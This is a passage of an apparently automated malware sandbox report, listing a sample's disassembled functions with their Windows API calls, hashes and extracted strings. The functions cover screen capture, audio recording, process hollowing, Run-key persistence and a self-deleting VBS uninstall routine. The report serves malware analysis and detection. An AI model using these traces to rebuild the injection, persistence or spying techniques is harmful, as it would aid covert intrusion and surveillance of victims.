                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                          • String ID:
                                                                                          • API String ID: 1663032902-0
                                                                                          • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                          • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                          • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                          • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                          Function 0045201B Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                          • EnumSystemLocalesW.KERNEL32(00452143,00000001), ref: 0045208D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          • Opcode ID: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
                                                                                          • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                          • Opcode Fuzzy Hash: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
                                                                                          • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                          Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 2692324296-0
                                                                                          • Opcode ID: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                                                                          • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                          • Opcode Fuzzy Hash: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                                                                          • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                          Function 004520B6 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                          • EnumSystemLocalesW.KERNEL32(00452393,00000001), ref: 00452102
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          • Opcode ID: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
                                                                                          • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                          • Opcode Fuzzy Hash: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
                                                                                          • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                          Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                          • EnumSystemLocalesW.KERNEL32(Function_0004843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1272433827-0
                                                                                          • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                          • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                          • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                          • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                          Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                          • EnumSystemLocalesW.KERNEL32(00451F27,00000001), ref: 00452007
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                          • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                          • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                          • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                          Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                          • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                          • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Function 00418EB1 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                            • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                          • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                          • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                          • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                          • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                                          • DeleteObject.GDI32(?), ref: 00419027
                                                                                          • DeleteObject.GDI32(?), ref: 00419034
                                                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                          • DeleteDC.GDI32(?), ref: 004191B7
                                                                                          • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                          • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                          • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                          • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                          • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                          • DeleteDC.GDI32(?), ref: 00419293
                                                                                          • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                          • String ID: DISPLAY
                                                                                          • API String ID: 4256916514-865373369
                                                                                          • Opcode ID: 5aa8ba5f4fa3625dde88f89095c127eaec24427bf1a19f92978ea0438fce6c5f
                                                                                          • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                          • Opcode Fuzzy Hash: 5aa8ba5f4fa3625dde88f89095c127eaec24427bf1a19f92978ea0438fce6c5f
                                                                                          • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                          Function 0041812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                          • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                          • GetLastError.KERNEL32 ref: 004184B5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                          • API String ID: 4188446516-3035715614
                                                                                          • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                          • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                          • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                          • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                                          Function 0040D45B Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                          • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                          • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                          • API String ID: 1861856835-2731992618
                                                                                          • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                                          • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                          • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                                          • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                          Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                          • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                          • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                          • API String ID: 738084811-2094122233
                                                                                          • Opcode ID: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                                          • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                          • Opcode Fuzzy Hash: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                                          • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                          Function 0040D0D1 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 260registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                          • ExitProcess.KERNEL32 ref: 0040D454
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                          • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                          • API String ID: 3797177996-2101481668
                                                                                          • Opcode ID: 54b64125b67377fc7bd1dcd8851340f67987214f4c55140a652dce6bd793e06d
                                                                                          • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                          • Opcode Fuzzy Hash: 54b64125b67377fc7bd1dcd8851340f67987214f4c55140a652dce6bd793e06d
                                                                                          • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                          Function 004124B0 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 190synchronizationsleepfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                                          • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                          • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                          • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                          • String ID: .exe$WDH$exepath$open$temp_
                                                                                          • API String ID: 2649220323-3088914985
                                                                                          • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                          • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                          • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                          • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                          Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
